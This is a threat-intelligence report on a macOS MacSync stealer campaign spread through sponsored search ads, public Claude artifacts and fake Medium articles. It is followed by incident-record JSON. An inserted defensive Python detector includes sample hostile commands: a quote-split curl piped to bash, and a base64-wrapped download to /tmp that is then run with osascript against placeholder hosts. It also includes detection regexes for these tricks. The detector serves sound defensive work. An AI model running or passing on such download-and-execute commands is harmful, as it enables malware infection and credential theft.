Sophisticated macOS Malware Campaign Exploits Google Ads, Claude AI, and Medium to Distribute MacSync Stealer
A recent malware campaign is targeting macOS users through a multi-pronged attack leveraging sponsored Google search results, Claude AI’s public artifact feature, and fraudulent Medium articles. The operation, uncovered by cybersecurity researchers at Moonlock Lab, has exposed over 15,000 users to the MacSync information stealer, which siphons sensitive data including keychain credentials, browser data, and cryptocurrency wallets.
The campaign employs two distinct variants, both using the ClickFix social engineering technique to deceive users into executing malicious commands.
First Variant: Fake DNS Resolver via Claude AI
When users search for "Online DNS resolver" on Google, a sponsored result directs them to a public Claude AI artifact titled "macOS Secure Command Execution." The fake guide masquerades as a legitimate security tool, instructing victims to paste a base64-encoded command into their Terminal. Upon execution, the command downloads a loader for MacSync from /tmp/osalogging.zip, which then establishes communication with a command-and-control (C2) server at a2abotnet[.]com/dynamic.
The malware uses a hardcoded authentication token and API key, spoofs a macOS browser User-Agent string to evade detection, and exfiltrates stolen data via Apple’s osascript utility. Larger datasets are uploaded in chunks with retry mechanisms and exponential backoff to ensure successful transmission. After exfiltration, the malware deletes staging files to cover its tracks.
Second Variant: Fake Disk Space Analyzer via Medium
A second attack vector targets users searching for "macOS CLI disk space analyzer" through a fraudulent Medium article hosted at apple-mac-disk-space.medium[.]com. The article impersonates Apple's official Support Team and delivers a similar ClickFix payload with additional obfuscation, including string concatenation tricks that split command names with empty quote pairs (e.g., cur""l) to bypass simple pattern-based detection. The malicious payload is fetched from raxelpak[.]com.
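Both delivery chains described above rely on the shell reassembling text that a naive scanner would not match: the first variant hides the real command behind base64, the second splits command names with empty quote pairs such as cur""l. From the defender's side the answer is to normalise the command text the same way the shell does before matching on it. The following Python is an added example, not code from the report, from Moonlock Lab or from the rankiteo record; the sample command lines, the .invalid hostnames and the indicator names are constructed for illustration, and the detector generalises the page's single cur""l instance to any quote-split word and to nested base64 stages.

```python
"""Normalise ClickFix-style shell one-liners before matching on them.

Added example (not code from the report or from Moonlock Lab). It undoes the two
evasions named on the page: shell quote-splitting of command names (cur""l) and
base64-wrapped commands piped into an interpreter. Indicator names, sample
commands and *.example.invalid hosts are constructed for this illustration.
"""
import base64
import binascii
import re
import shlex

# `echo <base64> | base64 -d`  (macOS base64 accepts -d, -D and --decode)
B64_PIPE = re.compile(
    r"echo\s+['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|\s*base64\s+(?:-d|-D|--decode)",
    re.IGNORECASE,
)
# decoded bytes handed straight to a shell or to osascript
B64_TO_SHELL = re.compile(r"base64\s+(?:-d|-D|--decode)\s*\|\s*(?:sh|bash|zsh|osascript)\b")
# an empty quote pair inside a word, e.g. cur""l or ba''sh
QUOTE_SPLIT = re.compile(r"\w(?:\"\"|'')\w")
DOWNLOADERS = {"curl", "wget"}
INTERPRETERS = {"sh", "bash", "zsh", "osascript"}


def normalize_shell(cmd: str) -> str:
    """Collapse shell quoting so that cur""l, cu'r'l and curl all compare equal.

    shlex implements POSIX word splitting, where adjacent quoted and unquoted
    fragments concatenate into one word; that is exactly what the trick relies on.
    """
    try:
        return " ".join(shlex.split(cmd))
    except ValueError:  # unbalanced quotes: crude fallback, strip quote characters
        return re.sub(r"[\"']", "", cmd)


def decode_b64_stages(cmd: str, depth: int = 0, max_depth: int = 3) -> list[str]:
    """Return each plaintext stage hidden behind `echo <b64> | base64 -d`, recursively."""
    stages: list[str] = []
    if depth >= max_depth:
        return stages
    for match in B64_PIPE.finditer(cmd):
        try:
            plain = base64.b64decode(match.group(1), validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            continue  # not really base64; leave it to the other indicators
        stages.append(plain)
        stages.extend(decode_b64_stages(plain, depth + 1, max_depth))
    return stages


def indicators_for(cmd: str) -> set[str]:
    """Heuristic indicators for one command string (raw text plus its normalised form)."""
    norm = normalize_shell(cmd)
    tokens = set(re.split(r"[\s|;&<>(){}]+", norm))
    found: set[str] = set()
    if QUOTE_SPLIT.search(cmd):
        found.add("quote_splitting")
    if B64_TO_SHELL.search(norm):
        found.add("base64_to_interpreter")
    if tokens & DOWNLOADERS and tokens & INTERPRETERS:
        found.add("download_and_execute")
    if "/tmp/" in norm and ".zip" in norm:  # archive staged under /tmp, as in the report
        found.add("tmp_archive_staging")
    if "osascript" in tokens:
        found.add("osascript_use")
    return found


def triage(cmd: str) -> dict:
    """Normalise, unwrap base64 stages, and collect indicators across all of them."""
    norm = normalize_shell(cmd)
    stages = decode_b64_stages(norm)
    found = indicators_for(cmd)
    for stage in stages:
        found |= indicators_for(stage)
    return {"normalized": norm, "stages": stages,
            "indicators": sorted(found), "suspicious": bool(found)}


# Constructed samples (no real campaign payloads; hosts are reserved .invalid names).
STAGE2 = ("curl -fsSL http://stage.example.invalid/osalogging.zip -o /tmp/osalogging.zip "
          "&& unzip -o /tmp/osalogging.zip -d /tmp && osascript /tmp/osalogging/run.scpt")
SAMPLE_COMMANDS = [
    "curl -s https://api.example.invalid/status | jq .",                    # benign
    "cu\"\"rl -fsSL http://dl.example.invalid/x.sh | ba''sh",                # quote-split
    f"echo {base64.b64encode(STAGE2.encode()).decode()} | base64 -d | sh",  # base64-wrapped
]

if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        result = triage(cmd)
        print(f"{'SUSPICIOUS' if result['suspicious'] else 'clean     '}  {cmd[:60]}")
        for name in result["indicators"]:
            print(f"    - {name}")
        for stage in result["stages"]:
            print(f"    decoded stage: {stage}")
```

Run it over Terminal history or the process arguments an EDR records; the point of the design is that every indicator is evaluated on the normalised text and on each decoded stage, so the quote-split and base64 layers add no cover. The recursion limit on decode_b64_stages bounds the work an attacker can force on the scanner, and a decode failure is deliberately ignored rather than treated as an error so that a line with a long random token still gets the remaining checks.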
Evasion Tactics and Broader Implications
The threat actors behind this campaign demonstrate a deep understanding of social engineering and evasion techniques, exploiting trusted platforms like Google Ads, Claude AI, and Medium to lend legitimacy to their attacks. By abusing these services, they bypass traditional security controls and reach a broader audience.
The MacSync stealer remains a persistent threat, with its operators continuously refining their methods to avoid detection while maximizing data theft. The campaign underscores the growing trend of malware distributors leveraging legitimate services to propagate malicious payloads.
Source: https://cyberpress.org/malicious-campaign-uses-claude-artifacts-and-google-ads/
Anthropic TPRM report: https://www.rankiteo.com/company/anthropicresearch
Google TPRM report: https://www.rankiteo.com/company/google-ads-
Medium TPRM report: https://www.rankiteo.com/company/medium-com
Apple TPRM report: https://www.rankiteo.com/company/apple
{
  "id": "antgooappmed1771064819",
  "linkid": "anthropicresearch, google-ads-, apple, medium-com",
  "type": "Cyber Attack",
  "date": "2/2026",
  "severity": "85",
  "impact": "4",
  "explanation": "Attack with significant impact with customers data leaks"
}
{
  "affected_entities": [
    {"customers_affected": "15,000+", "type": "Individual Users"}
  ],
  "attack_vector": ["Google Ads", "Claude AI Public Artifact", "Fraudulent Medium Articles"],
  "data_breach": {
    "data_exfiltration": true,
    "number_of_records_exposed": "15,000+",
    "personally_identifiable_information": true,
    "sensitivity_of_data": "High",
    "type_of_data_compromised": ["Keychain credentials", "Browser data", "Cryptocurrency wallets"]
  },
  "description": "A recent malware campaign is targeting macOS users through a multi-pronged attack leveraging sponsored Google search results, Claude AI’s public artifact feature, and fraudulent Medium articles. The operation has exposed over 15,000 users to the MacSync information stealer, which siphons sensitive data including keychain credentials, browser data, and cryptocurrency wallets. The campaign employs two distinct variants, both using the ClickFix social engineering technique to deceive users into executing malicious commands.",
  "impact": {
    "data_compromised": "Keychain credentials, browser data, cryptocurrency wallets",
    "identity_theft_risk": "High",
    "payment_information_risk": "High",
    "systems_affected": "macOS systems"
  },
  "initial_access_broker": {
    "entry_point": ["Google Ads", "Claude AI Public Artifact", "Fraudulent Medium Articles"]
  },
  "lessons_learned": "The campaign underscores the growing trend of malware distributors leveraging legitimate services (Google Ads, Claude AI, Medium) to propagate malicious payloads and bypass traditional security controls.",
  "motivation": "Data Theft",
  "post_incident_analysis": {
    "root_causes": "Exploitation of trusted platforms (Google Ads, Claude AI, Medium) for social engineering and malware distribution."
  },
  "ransomware": {"data_exfiltration": true},
  "references": [{"source": "Moonlock Lab"}],
  "response": {"third_party_assistance": "Moonlock Lab (Cybersecurity Researchers)"},
  "title": "Sophisticated macOS Malware Campaign Exploits Google Ads, Claude AI, and Medium to Distribute MacSync Stealer",
  "type": "Malware Campaign",
  "vulnerability_exploited": "Social Engineering (ClickFix technique)"
}